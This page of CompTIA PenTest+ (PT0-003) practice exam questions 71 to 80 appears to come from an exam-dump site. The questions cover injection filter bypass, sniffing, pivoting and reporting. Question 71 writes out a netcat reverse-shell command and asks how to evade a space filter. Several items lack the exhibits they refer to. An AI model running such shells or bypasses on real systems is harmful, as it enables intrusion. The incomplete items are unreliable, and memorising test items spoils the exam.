PT0-003 Exam Details

  • Exam Code
    :PT0-003
  • Exam Name
    :CompTIA PenTest+
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :404 Q&As
  • Last Updated
    :

CompTIA PT0-003 Online Questions & Answers

  • Question 71:

    A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability. The tester uses the following command:

    nc -e /bin/sh 10.10.10.16 4444

    Which of the following would most likely bypass the filtered space character?

    A. ${IFS}
    B. %0a
    C. + *
    D. %20

  • Question 72:

    During a security assessment, a penetration tester uses a tool to capture plaintext log-in credentials on the communication between a user and an authentication system. The tester wants to use this information for further unauthorized access.

    Which of the following tools is the tester using?

    A. Burp Suite
    B. Wireshark
    C. Zed Attack Proxy
    D. Metasploit

  • Question 73:

    A tester wants to pivot from a compromised host to another network with encryption and the least amount of interaction with the compromised host.

    Which of the following is the best way to accomplish this objective?

    A. Create an SSH tunnel using sshuttle to forward all the traffic to the compromised computer.
    B. Configure a VNC server on the target network and access the VNC server from the compromised computer.
    C. Set up a Metasploit listener on the compromised computer and create a reverse shell on the target network.
    D. Create a Netcat connection to the compromised computer and forward all the traffic to the target network.

  • Question 74:

    In a cloud environment, a security team discovers that an attacker accessed confidential information that was used to configure virtual machines during their initialization.

    Through which of the following features could this information have been accessed?

    A. IAM
    B. Block storage
    C. Virtual private cloud
    D. Metadata services

  • Question 75:

    Which of the following elements in a lock should be aligned to a specific level to allow the key cylinder to turn?

    A. Latches
    B. Pins
    C. Shackle
    D. Plug

  • Question 76:

    HOTSPOT

    You are a security analyst tasked with hardening a web server.

    You have been given a list of HTTP payloads that were flagged as malicious.

    INSTRUCTIONS

    Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.

    If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

  • Question 77:

    Which of the following is most important when communicating the need for vulnerability remediation to a client at the conclusion of a penetration test?

    A. Articulation of cause
    B. Articulation of impact
    C. Articulation of escalation
    D. Articulation of alignment

  • Question 78:

    Which of the following components should a penetration tester include in an assessment report?

    A. User activities
    B. Customer remediation plan
    C. Key management
    D. Attack narrative

  • Question 79:

    A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are:

    Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

    A. Edit the discovered file with one line of code for remote callback
    B. Download .pl files and look for usernames and passwords
    C. Edit the smb.conf file and upload it to the server
    D. Download the smb.conf file and look at configurations

  • Question 80:

    A penetration tester runs a vulnerability scan that identifies several issues across numerous customer hosts. The executive report outlines the following information:

    The client is conducting baseline monitoring using Aircrack-ng.

    Which of the following hosts should the penetration tester select for additional manual testing?

    A. Server 1
    B. Server 2
    C. Server 3
    D. Server 4

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your PT0-003 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.